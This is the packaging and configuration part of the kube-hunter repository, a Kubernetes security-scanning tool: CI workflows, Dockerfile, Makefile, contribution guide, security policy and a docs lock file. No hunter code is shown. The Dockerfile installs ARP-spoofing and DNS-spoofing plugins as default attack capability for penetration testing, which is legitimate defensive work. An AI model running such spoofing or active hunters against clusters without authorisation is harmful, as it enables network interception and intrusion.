├── .dockerignore
├── .flake8
├── .github
├── ISSUE_TEMPLATE
│ ├── bug_report.md
│ ├── feature_request.md
│ └── support_question.md
├── PULL_REQUEST_TEMPLATE.md
└── workflows
│ ├── lint.yml
│ ├── publish.yml
│ ├── release.yml
│ └── test.yml
├── .gitignore
├── .pre-commit-config.yaml
├── .yamllint
├── CONTRIBUTING.md
├── Dockerfile
├── LICENSE
├── MITRE.png
├── Makefile
├── NOTICE
├── README.md
├── SECURITY.md
├── docs
├── .gitignore
├── Gemfile
├── Gemfile.lock
├── _config.yml
├── _kb
│ ├── KHV002.md
│ ├── KHV003.md
│ ├── KHV004.md
│ ├── KHV005.md
│ ├── KHV006.md
│ ├── KHV007.md
│ ├── KHV020.md
│ ├── KHV021.md
│ ├── KHV022.md
│ ├── KHV023.md
│ ├── KHV024.md
│ ├── KHV025.md
│ ├── KHV026.md
│ ├── KHV027.md
│ ├── KHV028.md
│ ├── KHV029.md
│ ├── KHV030.md
│ ├── KHV031.md
│ ├── KHV032.md
│ ├── KHV033.md
│ ├── KHV034.md
│ ├── KHV036.md
│ ├── KHV037.md
│ ├── KHV038.md
│ ├── KHV039.md
│ ├── KHV040.md
│ ├── KHV041.md
│ ├── KHV042.md
│ ├── KHV043.md
│ ├── KHV044.md
│ ├── KHV045.md
│ ├── KHV046.md
│ ├── KHV047.md
│ ├── KHV049.md
│ ├── KHV050.md
│ ├── KHV051.md
│ ├── KHV052.md
│ └── KHV053.md
├── _layouts
│ └── default.html
├── index.md
└── kbindex.html
├── job.yaml
├── kube-hunter-screenshot.png
├── kube-hunter.png
├── kube-hunter.py
├── kube_hunter
├── README.md
├── __init__.py
├── __main__.py
├── conf
│ ├── __init__.py
│ ├── logging.py
│ └── parser.py
├── core
│ ├── __init__.py
│ ├── events
│ │ ├── __init__.py
│ │ ├── event_handler.py
│ │ └── types.py
│ └── types
│ │ ├── __init__.py
│ │ ├── components.py
│ │ ├── hunters.py
│ │ └── vulnerabilities.py
├── modules
│ ├── __init__.py
│ ├── discovery
│ │ ├── __init__.py
│ │ ├── apiserver.py
│ │ ├── dashboard.py
│ │ ├── etcd.py
│ │ ├── hosts.py
│ │ ├── kubectl.py
│ │ ├── kubelet.py
│ │ ├── kubernetes_client.py
│ │ ├── ports.py
│ │ └── proxy.py
│ ├── hunting
│ │ ├── __init__.py
│ │ ├── aks.py
│ │ ├── apiserver.py
│ │ ├── capabilities.py
│ │ ├── certificates.py
│ │ ├── cves.py
│ │ ├── dashboard.py
│ │ ├── etcd.py
│ │ ├── kubelet.py
│ │ ├── mounts.py
│ │ ├── proxy.py
│ │ └── secrets.py
│ └── report
│ │ ├── __init__.py
│ │ ├── base.py
│ │ ├── collector.py
│ │ ├── dispatchers.py
│ │ ├── factory.py
│ │ ├── json.py
│ │ ├── plain.py
│ │ └── yaml.py
└── plugins
│ ├── __init__.py
│ └── hookspecs.py
├── mypy.ini
├── pyinstaller_hooks
└── hook-prettytable.py
├── pyproject.toml
├── requirements-dev.txt
├── requirements.txt
├── setup.cfg
├── setup.py
└── tests
├── __init__.py
├── conf
└── test_logging.py
├── core
├── test_cloud.py
├── test_handler.py
└── test_subscribe.py
├── discovery
├── test_apiserver.py
├── test_hosts.py
└── test_k8s.py
├── hunting
├── test_aks.py
├── test_apiserver_hunter.py
├── test_certificates.py
├── test_cvehunting.py
├── test_dashboard.py
└── test_kubelet.py
├── modules
└── test_reports.py
└── plugins
├── test_hooks.py
└── test_plugins_hooks.py
/.dockerignore:
--------------------------------------------------------------------------------
1 | *.png
2 | tests/
3 | docs/
4 | .github/
5 |
--------------------------------------------------------------------------------
/.flake8:
--------------------------------------------------------------------------------
1 | [flake8]
2 | ignore = E203, E266, E501, W503, B903, T499, B020
3 | max-line-length = 120
4 | max-complexity = 18
5 | select = B,C,E,F,W,B9,T4
6 | mypy_config=mypy.ini
7 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Bug report
3 | about: I would like to report a bug within the project
4 | labels: bug
5 | ---
6 |
7 | ### What happened
8 |
9 |
12 |
13 | ### Expected behavior
14 |
15 |
18 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature_request.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Feature Request
3 | about: I have a suggestion (and might want to implement myself)
4 | labels: enhancement
5 | ---
6 |
7 | ## What would you like to be added
8 |
9 |
12 |
13 | ## Why is this needed
14 |
15 |
18 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/support_question.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Support Question
3 | about: I have a question and require assistance
4 | labels: question
5 | ---
6 |
7 |
11 |
12 | ## What are you trying to achieve
13 |
14 |
17 |
18 | ## Minimal example (if applicable)
19 |
20 |
24 |
--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE.md:
--------------------------------------------------------------------------------
1 |
5 |
6 | ## Description
7 | Please include a summary of the change and which issue is fixed. Also include relevant motivation and context. List any dependencies that are required for this change.
8 |
9 | ## Contribution Guidelines
10 | Please Read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md).
11 |
12 | ## Fixed Issues
13 |
14 | Please mention any issues fixed in the PR by referencing it properly in the commit message.
15 | As per the convention, use appropriate keywords such as `fixes`, `closes`, `resolves` to automatically refer the issue.
16 | Please consult [official github documentation](https://help.github.com/en/github/managing-your-work-on-github/closing-issues-using-keywords) for details.
17 |
18 | Fixes #(issue)
19 |
20 | ## "BEFORE" and "AFTER" output
21 |
22 | To verify that the change works as desired, please include an output of terminal before and after the changes under headings "BEFORE" and "AFTER".
23 |
24 | ### BEFORE
25 | Any Terminal Output Before Changes.
26 |
27 | ### AFTER
28 | Any Terminal Output Before Changes.
29 |
30 | ## Contribution checklist
31 | - [ ] I have read the Contributing Guidelines.
32 | - [ ] The commits refer to an active issue in the repository.
33 | - [ ] I have added automated testing to cover this case.
34 |
35 | ## Notes
36 | Please mention if you have not checked any of the above boxes.
37 |
--------------------------------------------------------------------------------
/.github/workflows/lint.yml:
--------------------------------------------------------------------------------
1 | ---
2 | name: Lint
3 |
4 | on: [push, pull_request]
5 |
6 | jobs:
7 | build:
8 | runs-on: ubuntu-20.04
9 |
10 | steps:
11 | - uses: actions/checkout@v2
12 | - uses: actions/setup-python@v2
13 | - uses: pre-commit/action@v2.0.0
14 | - uses: ibiqlik/action-yamllint@v3
15 |
--------------------------------------------------------------------------------
/.github/workflows/publish.yml:
--------------------------------------------------------------------------------
1 | ---
2 | name: Publish
3 | on:
4 | push:
5 | tags:
6 | - "v*"
7 | env:
8 | ALIAS: aquasecurity
9 | REP: kube-hunter
10 | jobs:
11 | dockerhub:
12 | name: Publish To Docker Hub
13 | runs-on: ubuntu-18.04
14 | steps:
15 | - name: Check Out Repo
16 | uses: actions/checkout@v2
17 | - name: Set up QEMU
18 | uses: docker/setup-qemu-action@v1
19 | - name: Set up Docker Buildx
20 | id: buildx
21 | uses: docker/setup-buildx-action@v1
22 | - name: Cache Docker layers
23 | uses: actions/cache@v2
24 | with:
25 | path: /tmp/.buildx-cache
26 | key: ${{ runner.os }}-buildxarch-${{ github.sha }}
27 | restore-keys: |
28 | ${{ runner.os }}-buildxarch-
29 | - name: Login to Docker Hub
30 | uses: docker/login-action@v1
31 | with:
32 | username: ${{ secrets.DOCKERHUB_USER }}
33 | password: ${{ secrets.DOCKERHUB_TOKEN }}
34 | - name: Login to ECR
35 | uses: docker/login-action@v1
36 | with:
37 | registry: public.ecr.aws
38 | username: ${{ secrets.ECR_ACCESS_KEY_ID }}
39 | password: ${{ secrets.ECR_SECRET_ACCESS_KEY }}
40 | - name: Get version
41 | id: get_version
42 | uses: crazy-max/ghaction-docker-meta@v3
43 | with:
44 | images: ${{ env.REP }}
45 | tag-semver: |
46 | {{version}}
47 |
48 | - name: Build and push - Docker/ECR
49 | id: docker_build
50 | uses: docker/build-push-action@v2
51 | with:
52 | context: .
53 | platforms: linux/amd64
54 | builder: ${{ steps.buildx.outputs.name }}
55 | push: true
56 | tags: |
57 | ${{ secrets.DOCKERHUB_USER }}/${{ env.REP }}:${{ steps.get_version.outputs.version }}
58 | public.ecr.aws/${{ env.ALIAS }}/${{ env.REP }}:${{ steps.get_version.outputs.version }}
59 | ${{ secrets.DOCKERHUB_USER }}/${{ env.REP }}:latest
60 | public.ecr.aws/${{ env.ALIAS }}/${{ env.REP }}:latest
61 | cache-from: type=local,src=/tmp/.buildx-cache/release
62 | cache-to: type=local,mode=max,dest=/tmp/.buildx-cache/release
63 |
64 | - name: Image digest
65 | run: echo ${{ steps.docker_build.outputs.digest }}
66 |
67 | pypi:
68 | name: Publish To PyPI
69 | runs-on: ubuntu-18.04
70 | steps:
71 | - name: Checkout code
72 | uses: actions/checkout@v2
73 |
74 | - name: Set up Python
75 | uses: actions/setup-python@v2
76 | with:
77 | python-version: '3.9'
78 |
79 | - name: Install dependencies
80 | shell: bash
81 | run: |
82 | pip install -U pip
83 | make deps
84 |
85 | - name: Build project
86 | shell: bash
87 | run: |
88 | python -m pip install wheel
89 | make build
90 |
91 | - name: Publish distribution package to PyPI
92 | if: startsWith(github.ref, 'refs/tags')
93 | uses: pypa/gh-action-pypi-publish@master
94 | with:
95 | password: ${{ secrets.PYPI_API_TOKEN }}
96 |
--------------------------------------------------------------------------------
/.github/workflows/release.yml:
--------------------------------------------------------------------------------
1 | ---
2 | on:
3 | push:
4 | # Sequence of patterns matched against refs/tags
5 | tags:
6 | - 'v*' # Push events to matching v*, i.e. v1.0, v20.15.10
7 |
8 | name: Release
9 |
10 | jobs:
11 | build:
12 | name: Upload Release Asset
13 | runs-on: ubuntu-18.04
14 | steps:
15 | - name: Checkout code
16 | uses: actions/checkout@v2
17 |
18 | - name: Set up Python
19 | uses: actions/setup-python@v2
20 | with:
21 | python-version: '3.8'
22 |
23 | - name: Install dependencies
24 | shell: bash
25 | run: |
26 | pip install -U pip
27 | pip install pyinstaller
28 | make deps
29 |
30 | - name: Build project
31 | shell: bash
32 | run: |
33 | make pyinstaller
34 |
35 | - name: Create Release
36 | id: create_release
37 | uses: actions/create-release@v1
38 | env:
39 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
40 | with:
41 | tag_name: ${{ github.ref }}
42 | release_name: ${{ github.ref }}
43 | draft: false
44 | prerelease: false
45 |
46 | - name: Upload Release Asset
47 | id: upload-release-asset
48 | uses: actions/upload-release-asset@v1
49 | env:
50 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
51 | with:
52 | upload_url: ${{ steps.create_release.outputs.upload_url }}
53 | asset_path: ./dist/kube-hunter
54 | asset_name: kube-hunter-linux-x86_64-${{ github.ref }}
55 | asset_content_type: application/octet-stream
56 |
--------------------------------------------------------------------------------
/.github/workflows/test.yml:
--------------------------------------------------------------------------------
1 | ---
2 | name: Test
3 |
4 | on: [push, pull_request]
5 |
6 | env:
7 | FORCE_COLOR: 1
8 |
9 | jobs:
10 | build:
11 | runs-on: ${{ matrix.os }}
12 | strategy:
13 | fail-fast: false
14 | matrix:
15 | python-version: ["3.6", "3.7", "3.8", "3.9"]
16 | os: [ubuntu-20.04, ubuntu-18.04]
17 |
18 | steps:
19 | - uses: actions/checkout@v2
20 |
21 | - name: Set up Python ${{ matrix.python-version }}
22 | uses: actions/setup-python@v2
23 | with:
24 | python-version: ${{ matrix.python-version }}
25 |
26 | - name: Get pip cache dir
27 | id: pip-cache
28 | run: |
29 | echo "::set-output name=dir::$(pip cache dir)"
30 |
31 | - name: Cache
32 | uses: actions/cache@v2
33 | with:
34 | path: ${{ steps.pip-cache.outputs.dir }}
35 | key:
36 | ${{ matrix.os }}-${{ matrix.python-version }}-${{ hashFiles('requirements-dev.txt') }}
37 | restore-keys: |
38 | ${{ matrix.os }}-${{ matrix.python-version }}-
39 |
40 | - name: Install dependencies
41 | shell: bash
42 | run: |
43 | pip install -U pip
44 | make dev-deps
45 | make install
46 |
47 | - name: Test
48 | shell: bash
49 | run: |
50 | make test
51 |
52 | - name: Upload coverage
53 | uses: codecov/codecov-action@v1
54 | with:
55 | name: ${{ matrix.os }} Python ${{ matrix.python-version }}
56 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | .venv
3 | *aqua*
4 | venv/
5 | .vscode
6 | .coverage
7 | .idea
8 |
9 | # Distribution / packaging
10 | .Python
11 | env/
12 | build/
13 | develop-eggs/
14 | dist/
15 | downloads/
16 | eggs/
17 | lib/
18 | lib64/
19 | parts/
20 | sdist/
21 | var/
22 | *.egg-info/
23 | .installed.cfg
24 | *.egg
25 | *.spec
26 | .eggs
27 | pip-wheel-metadata
28 |
29 | # Directory Cache Files
30 | .DS_Store
31 | thumbs.db
32 | __pycache__
33 | .mypy_cache
34 |
--------------------------------------------------------------------------------
/.pre-commit-config.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | repos:
3 | - repo: https://github.com/psf/black
4 | rev: stable
5 | hooks:
6 | - id: black
7 | - repo: https://gitlab.com/pycqa/flake8
8 | rev: 3.7.9
9 | hooks:
10 | - id: flake8
11 | additional_dependencies: [flake8-bugbear]
12 |
--------------------------------------------------------------------------------
/.yamllint:
--------------------------------------------------------------------------------
1 | ---
2 | extends: default
3 |
4 | rules:
5 | line-length: disable
6 | truthy: disable
7 |
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | ## Contribution Guide
2 |
3 | ## Welcome Aboard
4 |
5 | Thank you for taking interest in contributing to kube-hunter!
6 | This guide will walk you through the development process of kube-hunter.
7 |
8 | ## Setting Up
9 |
10 | kube-hunter is written in Python 3 and supports versions 3.6 and above.
11 | You'll probably want to create a virtual environment for your local project.
12 | Once you got your project and IDE set up, you can `make dev-deps` and start contributing!
13 | You may also install a pre-commit hook to take care of linting - `pre-commit install`.
14 |
15 | ## Issues
16 |
17 | - Feel free to open issues for any reason as long as you make it clear if this issue is about a bug/feature/hunter/question/comment.
18 | - Please spend a small amount of time giving due diligence to the issue tracker. Your issue might be a duplicate. If it is, please add your comment to the existing issue.
19 | - Remember users might be searching for your issue in the future, so please give it a meaningful title to help others.
20 | - The issue should clearly explain the reason for opening, the proposal if you have any, and any relevant technical information.
21 |
22 | ## Pull Requests
23 |
24 | 1. Every Pull Request should have an associated Issue unless you are fixing a trivial documentation issue.
25 | 1. Your PR is more likely to be accepted if it focuses on just one change.
26 | 1. Describe what the PR does. There's no convention enforced, but please try to be concise and descriptive. Treat the PR description as a commit message. Titles that start with "fix"/"add"/"improve"/"remove" are good examples.
27 | 1. Please add the associated Issue in the PR description.
28 | 1. There's no need to add or tag reviewers.
29 | 1. If a reviewer commented on your code or asked for changes, please remember to mark the discussion as resolved after you address it. PRs with unresolved issues should not be merged (even if the comment is unclear or requires no action from your side).
30 | 1. Please include a comment with the results before and after your change.
31 | 1. Your PR is more likely to be accepted if it includes tests (We have not historically been very strict about tests, but we would like to improve this!).
32 |
33 | ## Hunters
34 |
35 | If you are contributing a new Hunter:
36 | 1. When you open an issue to present the Hunter, please specify which `Vulnerability` classes you plan to add.
37 | 1. A maintainer will assign each `Vulnerability` a VID for you to include in your Hunter code.
38 | 1. Please add a KB article to `/docs/kb/` explaining the vulnerability and suggesting remediation steps. Look at other articles for examples.
39 | 1. Please adhere to the following types convention: Use `Hunter` class to report vulnerabilities, `ActiveHunter` if your Hunter might change the state of the cluster, and `Discovery` for scanning the cluster (all are descendants of `HunterBase`). Also, use the `Vulnerability` class to report findings, and `Service` to report a discovery to be used by a hunter (both are descendants of `Event`, refrain from using `Event` directly).
40 |
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.8-alpine as builder
2 |
3 | RUN apk add --no-cache \
4 | linux-headers \
5 | tcpdump \
6 | build-base \
7 | ebtables \
8 | make \
9 | git && \
10 | apk upgrade --no-cache
11 |
12 | WORKDIR /kube-hunter
13 | COPY setup.py setup.cfg Makefile ./
14 | RUN make deps
15 |
16 | COPY . .
17 | RUN make install
18 |
19 | FROM python:3.8-alpine
20 |
21 | RUN apk add --no-cache \
22 | tcpdump \
23 | ebtables && \
24 | apk upgrade --no-cache
25 |
26 | COPY --from=builder /usr/local/lib/python3.8/site-packages /usr/local/lib/python3.8/site-packages
27 | COPY --from=builder /usr/local/bin/kube-hunter /usr/local/bin/kube-hunter
28 |
29 | # Add default plugins: https://github.com/aquasecurity/kube-hunter-plugins
30 | RUN pip install kube-hunter-arp-spoof>=0.0.3 kube-hunter-dns-spoof>=0.0.3
31 |
32 | ENTRYPOINT ["kube-hunter"]
33 |
--------------------------------------------------------------------------------
/MITRE.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aquasecurity/kube-hunter/bc47f08e88ea2a5fb059bf3b8a8edb1aefb4c6cc/MITRE.png
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | .SILENT: clean
2 |
3 | NAME := kube-hunter
4 | SRC := kube_hunter
5 | ENTRYPOINT := $(SRC)/__main__.py
6 | DIST := dist
7 | COMPILED := $(DIST)/$(NAME)
8 | STATIC_COMPILED := $(COMPILED).static
9 |
10 |
11 | .PHONY: deps
12 | deps:
13 | requires=$(shell mktemp)
14 | python setup.py -q dependencies > \$requires
15 | pip install -r \$requires
16 | rm \$requires
17 |
18 | .PHONY: dev-deps
19 | dev-deps:
20 | pip install -r requirements-dev.txt
21 |
22 | .PHONY: lint
23 | lint:
24 | black .
25 | flake8
26 |
27 | .PHONY: lint-check
28 | lint-check:
29 | flake8
30 | black --check --diff .
31 |
32 | .PHONY: test
33 | test:
34 | python -m pytest
35 |
36 | .PHONY: build
37 | build:
38 | python setup.py sdist bdist_wheel
39 |
40 | .PHONY: pyinstaller
41 | pyinstaller: deps
42 | python setup.py pyinstaller
43 |
44 | .PHONY: staticx_deps
45 | staticx_deps:
46 | command -v patchelf > /dev/null 2>&1 || (echo "patchelf is not available. install it in order to use staticx" && false)
47 |
48 | .PHONY: pyinstaller_static
49 | pyinstaller_static: staticx_deps pyinstaller
50 | staticx $(COMPILED) $(STATIC_COMPILED)
51 |
52 | .PHONY: install
53 | install:
54 | pip install .
55 |
56 | .PHONY: uninstall
57 | uninstall:
58 | pip uninstall $(NAME)
59 |
60 | .PHONY: publish
61 | publish:
62 | twine upload dist/*
63 |
64 | .PHONY: clean
65 | clean:
66 | rm -rf build/ dist/ *.egg-info/ .eggs/ .pytest_cache/ .mypy_cache .coverage *.spec
67 | find . -type d -name __pycache__ -exec rm -rf '{}' +
68 |
--------------------------------------------------------------------------------
/NOTICE:
--------------------------------------------------------------------------------
1 | kube-hunter
2 | Copyright 2018-2019 Aqua Security Software Ltd.
3 |
4 | This product includes software developed by Aqua Security (https://aquasec.com).
5 |
--------------------------------------------------------------------------------
/SECURITY.md:
--------------------------------------------------------------------------------
1 | # Security Policy
2 |
3 | ## Supported Versions
4 |
5 | | Version | Supported |
6 | | --------- | ------------------ |
7 | | 0.4.x | :white_check_mark: |
8 | | 0.3.x | :white_check_mark: |
9 |
10 | ## Reporting a Vulnerability
11 | We encourage you to find vulnerabilities in kube-hunter.
12 | The process is simple, just report a Bug issue. and we will take a look at this.
13 | If you prefer to disclose privately, you can write to one of the security maintainers at:
14 |
15 | | Name | Email |
16 | | ----------- | ------------------ |
17 | | Daniel Sagi | daniel.sagi@aquasec.com |
18 |
--------------------------------------------------------------------------------
/docs/.gitignore:
--------------------------------------------------------------------------------
1 | _site
--------------------------------------------------------------------------------
/docs/Gemfile:
--------------------------------------------------------------------------------
1 | source 'https://rubygems.org'
2 | gem 'github-pages', group: :jekyll_plugins
3 | gem 'jekyll-sitemap'
--------------------------------------------------------------------------------
/docs/Gemfile.lock:
--------------------------------------------------------------------------------
1 | GEM
2 | remote: https://rubygems.org/
3 | specs:
4 | activesupport (6.0.3.4)
5 | concurrent-ruby (~> 1.0, >= 1.0.2)
6 | i18n (>= 0.7, < 2)
7 | minitest (~> 5.1)
8 | tzinfo (~> 1.1)
9 | zeitwerk (~> 2.2, >= 2.2.2)
10 | addressable (2.7.0)
11 | public_suffix (>= 2.0.2, < 5.0)
12 | coffee-script (2.4.1)
13 | coffee-script-source
14 | execjs
15 | coffee-script-source (1.11.1)
16 | colorator (1.1.0)
17 | commonmarker (0.17.13)
18 | ruby-enum (~> 0.5)
19 | concurrent-ruby (1.1.7)
20 | dnsruby (1.61.5)
21 | simpleidn (~> 0.1)
22 | em-websocket (0.5.2)
23 | eventmachine (>= 0.12.9)
24 | http_parser.rb (~> 0.6.0)
25 | ethon (0.12.0)
26 | ffi (>= 1.3.0)
27 | eventmachine (1.2.7)
28 | execjs (2.7.0)
29 | faraday (1.3.0)
30 | faraday-net_http (~> 1.0)
31 | multipart-post (>= 1.2, < 3)
32 | ruby2_keywords
33 | faraday-net_http (1.0.1)
34 | ffi (1.14.2)
35 | forwardable-extended (2.6.0)
36 | gemoji (3.0.1)
37 | github-pages (209)
38 | github-pages-health-check (= 1.16.1)
39 | jekyll (= 3.9.0)
40 | jekyll-avatar (= 0.7.0)
41 | jekyll-coffeescript (= 1.1.1)
42 | jekyll-commonmark-ghpages (= 0.1.6)
43 | jekyll-default-layout (= 0.1.4)
44 | jekyll-feed (= 0.15.1)
45 | jekyll-gist (= 1.5.0)
46 | jekyll-github-metadata (= 2.13.0)
47 | jekyll-mentions (= 1.6.0)
48 | jekyll-optional-front-matter (= 0.3.2)
49 | jekyll-paginate (= 1.1.0)
50 | jekyll-readme-index (= 0.3.0)
51 | jekyll-redirect-from (= 0.16.0)
52 | jekyll-relative-links (= 0.6.1)
53 | jekyll-remote-theme (= 0.4.2)
54 | jekyll-sass-converter (= 1.5.2)
55 | jekyll-seo-tag (= 2.6.1)
56 | jekyll-sitemap (= 1.4.0)
57 | jekyll-swiss (= 1.0.0)
58 | jekyll-theme-architect (= 0.1.1)
59 | jekyll-theme-cayman (= 0.1.1)
60 | jekyll-theme-dinky (= 0.1.1)
61 | jekyll-theme-hacker (= 0.1.2)
62 | jekyll-theme-leap-day (= 0.1.1)
63 | jekyll-theme-merlot (= 0.1.1)
64 | jekyll-theme-midnight (= 0.1.1)
65 | jekyll-theme-minimal (= 0.1.1)
66 | jekyll-theme-modernist (= 0.1.1)
67 | jekyll-theme-primer (= 0.5.4)
68 | jekyll-theme-slate (= 0.1.1)
69 | jekyll-theme-tactile (= 0.1.1)
70 | jekyll-theme-time-machine (= 0.1.1)
71 | jekyll-titles-from-headings (= 0.5.3)
72 | jemoji (= 0.12.0)
73 | kramdown (= 2.3.0)
74 | kramdown-parser-gfm (= 1.1.0)
75 | liquid (= 4.0.3)
76 | mercenary (~> 0.3)
77 | minima (= 2.5.1)
78 | nokogiri (>= 1.10.4, < 2.0)
79 | rouge (= 3.23.0)
80 | terminal-table (~> 1.4)
81 | github-pages-health-check (1.16.1)
82 | addressable (~> 2.3)
83 | dnsruby (~> 1.60)
84 | octokit (~> 4.0)
85 | public_suffix (~> 3.0)
86 | typhoeus (~> 1.3)
87 | html-pipeline (2.14.0)
88 | activesupport (>= 2)
89 | nokogiri (>= 1.4)
90 | http_parser.rb (0.6.0)
91 | i18n (0.9.5)
92 | concurrent-ruby (~> 1.0)
93 | jekyll (3.9.0)
94 | addressable (~> 2.4)
95 | colorator (~> 1.0)
96 | em-websocket (~> 0.5)
97 | i18n (~> 0.7)
98 | jekyll-sass-converter (~> 1.0)
99 | jekyll-watch (~> 2.0)
100 | kramdown (>= 1.17, < 3)
101 | liquid (~> 4.0)
102 | mercenary (~> 0.3.3)
103 | pathutil (~> 0.9)
104 | rouge (>= 1.7, < 4)
105 | safe_yaml (~> 1.0)
106 | jekyll-avatar (0.7.0)
107 | jekyll (>= 3.0, < 5.0)
108 | jekyll-coffeescript (1.1.1)
109 | coffee-script (~> 2.2)
110 | coffee-script-source (~> 1.11.1)
111 | jekyll-commonmark (1.3.1)
112 | commonmarker (~> 0.14)
113 | jekyll (>= 3.7, < 5.0)
114 | jekyll-commonmark-ghpages (0.1.6)
115 | commonmarker (~> 0.17.6)
116 | jekyll-commonmark (~> 1.2)
117 | rouge (>= 2.0, < 4.0)
118 | jekyll-default-layout (0.1.4)
119 | jekyll (~> 3.0)
120 | jekyll-feed (0.15.1)
121 | jekyll (>= 3.7, < 5.0)
122 | jekyll-gist (1.5.0)
123 | octokit (~> 4.2)
124 | jekyll-github-metadata (2.13.0)
125 | jekyll (>= 3.4, < 5.0)
126 | octokit (~> 4.0, != 4.4.0)
127 | jekyll-mentions (1.6.0)
128 | html-pipeline (~> 2.3)
129 | jekyll (>= 3.7, < 5.0)
130 | jekyll-optional-front-matter (0.3.2)
131 | jekyll (>= 3.0, < 5.0)
132 | jekyll-paginate (1.1.0)
133 | jekyll-readme-index (0.3.0)
134 | jekyll (>= 3.0, < 5.0)
135 | jekyll-redirect-from (0.16.0)
136 | jekyll (>= 3.3, < 5.0)
137 | jekyll-relative-links (0.6.1)
138 | jekyll (>= 3.3, < 5.0)
139 | jekyll-remote-theme (0.4.2)
140 | addressable (~> 2.0)
141 | jekyll (>= 3.5, < 5.0)
142 | jekyll-sass-converter (>= 1.0, <= 3.0.0, != 2.0.0)
143 | rubyzip (>= 1.3.0, < 3.0)
144 | jekyll-sass-converter (1.5.2)
145 | sass (~> 3.4)
146 | jekyll-seo-tag (2.6.1)
147 | jekyll (>= 3.3, < 5.0)
148 | jekyll-sitemap (1.4.0)
149 | jekyll (>= 3.7, < 5.0)
150 | jekyll-swiss (1.0.0)
151 | jekyll-theme-architect (0.1.1)
152 | jekyll (~> 3.5)
153 | jekyll-seo-tag (~> 2.0)
154 | jekyll-theme-cayman (0.1.1)
155 | jekyll (~> 3.5)
156 | jekyll-seo-tag (~> 2.0)
157 | jekyll-theme-dinky (0.1.1)
158 | jekyll (~> 3.5)
159 | jekyll-seo-tag (~> 2.0)
160 | jekyll-theme-hacker (0.1.2)
161 | jekyll (> 3.5, < 5.0)
162 | jekyll-seo-tag (~> 2.0)
163 | jekyll-theme-leap-day (0.1.1)
164 | jekyll (~> 3.5)
165 | jekyll-seo-tag (~> 2.0)
166 | jekyll-theme-merlot (0.1.1)
167 | jekyll (~> 3.5)
168 | jekyll-seo-tag (~> 2.0)
169 | jekyll-theme-midnight (0.1.1)
170 | jekyll (~> 3.5)
171 | jekyll-seo-tag (~> 2.0)
172 | jekyll-theme-minimal (0.1.1)
173 | jekyll (~> 3.5)
174 | jekyll-seo-tag (~> 2.0)
175 | jekyll-theme-modernist (0.1.1)
176 | jekyll (~> 3.5)
177 | jekyll-seo-tag (~> 2.0)
178 | jekyll-theme-primer (0.5.4)
179 | jekyll (> 3.5, < 5.0)
180 | jekyll-github-metadata (~> 2.9)
181 | jekyll-seo-tag (~> 2.0)
182 | jekyll-theme-slate (0.1.1)
183 | jekyll (~> 3.5)
184 | jekyll-seo-tag (~> 2.0)
185 | jekyll-theme-tactile (0.1.1)
186 | jekyll (~> 3.5)
187 | jekyll-seo-tag (~> 2.0)
188 | jekyll-theme-time-machine (0.1.1)
189 | jekyll (~> 3.5)
190 | jekyll-seo-tag (~> 2.0)
191 | jekyll-titles-from-headings (0.5.3)
192 | jekyll (>= 3.3, < 5.0)
193 | jekyll-watch (2.2.1)
194 | listen (~> 3.0)
195 | jemoji (0.12.0)
196 | gemoji (~> 3.0)
197 | html-pipeline (~> 2.2)
198 | jekyll (>= 3.0, < 5.0)
199 | kramdown (2.3.0)
200 | rexml (>= 3.2.5)
201 | kramdown-parser-gfm (1.1.0)
202 | kramdown (>= 2.3.1)
203 | liquid (4.0.3)
204 | listen (3.4.0)
205 | rb-fsevent (~> 0.10, >= 0.10.3)
206 | rb-inotify (~> 0.9, >= 0.9.10)
207 | mercenary (0.3.6)
208 | mini_portile2 (2.5.0)
209 | minima (2.5.1)
210 | jekyll (>= 3.5, < 5.0)
211 | jekyll-feed (~> 0.9)
212 | jekyll-seo-tag (~> 2.1)
213 | minitest (5.14.3)
214 | multipart-post (2.1.1)
215 | nokogiri (>= 1.11.4)
216 | mini_portile2 (~> 2.5.0)
217 | racc (~> 1.4)
218 | octokit (4.20.0)
219 | faraday (>= 0.9)
220 | sawyer (~> 0.8.0, >= 0.5.3)
221 | pathutil (0.16.2)
222 | forwardable-extended (~> 2.6)
223 | public_suffix (3.1.1)
224 | racc (1.5.2)
225 | rb-fsevent (0.10.4)
226 | rb-inotify (0.10.1)
227 | ffi (~> 1.0)
228 | rexml (3.2.4)
229 | rouge (3.23.0)
230 | ruby-enum (0.8.0)
231 | i18n
232 | ruby2_keywords (0.0.2)
233 | rubyzip (2.3.0)
234 | safe_yaml (1.0.5)
235 | sass (3.7.4)
236 | sass-listen (~> 4.0.0)
237 | sass-listen (4.0.0)
238 | rb-fsevent (~> 0.9, >= 0.9.4)
239 | rb-inotify (~> 0.9, >= 0.9.7)
240 | sawyer (0.8.2)
241 | addressable (>= 2.3.5)
242 | faraday (> 0.8, < 2.0)
243 | simpleidn (0.1.1)
244 | unf (~> 0.1.4)
245 | terminal-table (1.8.0)
246 | unicode-display_width (~> 1.1, >= 1.1.1)
247 | thread_safe (0.3.6)
248 | typhoeus (1.4.0)
249 | ethon (>= 0.9.0)
250 | tzinfo (1.2.9)
251 | thread_safe (~> 0.1)
252 | unf (0.1.4)
253 | unf_ext
254 | unf_ext (0.0.7.7)
255 | unicode-display_width (1.7.0)
256 | zeitwerk (2.4.2)
257 |
258 | PLATFORMS
259 | ruby
260 |
261 | DEPENDENCIES
262 | github-pages
263 | jekyll-sitemap
264 |
265 | BUNDLED WITH
266 | 2.2.5
267 |
--------------------------------------------------------------------------------
